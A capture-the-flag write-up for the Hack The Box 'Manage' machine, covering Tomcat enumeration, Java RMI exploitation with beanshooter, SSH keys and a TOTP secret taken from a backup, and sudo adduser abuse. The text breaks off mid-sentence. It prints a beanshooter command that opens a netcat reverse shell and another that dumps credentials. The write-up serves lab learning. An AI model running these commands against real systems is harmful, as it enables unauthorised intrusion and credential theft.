HTB Manage CTF Writeup
Tomcat's management interface is restricted to localhost, but Java RMI on port 2222 allows credential dumping and RCE via beanshooter. An unprotected backup directory leaks SSH keys and a TOTP secret for lateral movement. A restricted sudo rule permitting adduser is abused by creating a user named admin, which Ubuntu automatically adds to the sudo group.
HTB Manage CTF
Web Server Enumeration
Port 8080 is open with apache tomcat
Specifically on version 10.1.19.
Trying to access the management interface leads to nothing. Doesn’t even ask for credentials, saying that only machines connected from the same host running the tomcat application are able to login.
Java RMI
Port 2222 is also open in the machine, and it’s running Java RMI
Java RMI (Remote Method Invocation) is a Java API that allows an object running in one JVM (Java Virtual Machine) to invoke methods on an object running in another JVM, even if they’re on different physical machines. RMI provides a mechanism for Java-based distributed computing.
It’s possible to not only dump the credentials for the tomcat application but also achieve remote command execution using the “beanshooter” tool pretty easily.
Reference: https://swisskyrepo.github.io/PayloadsAllTheThings/Java%20RMI/#rce-using-beanshooter
More specifically, to get RCE:
1
beanshooter standard 172.17.0.2 2222 exec 'nc 172.17.0.1 4444 -e ash' # change reverse shell method
To dump credentials and more info:
1
beanshooter enum 172.17.0.2 2222
Horizontal Privilege Escalation
The useradmin user had an unprotected backup folder in their home folder, which allowed me to save a copy to my machine and obtain sensitive information about that user, like SSH private keys and two factor authentication secret token.
I used this information to log in as “useradmin” to the machine via ssh.
Vertical Privilege Escalation
User “useradmin” has sudo permissions to run “adduser

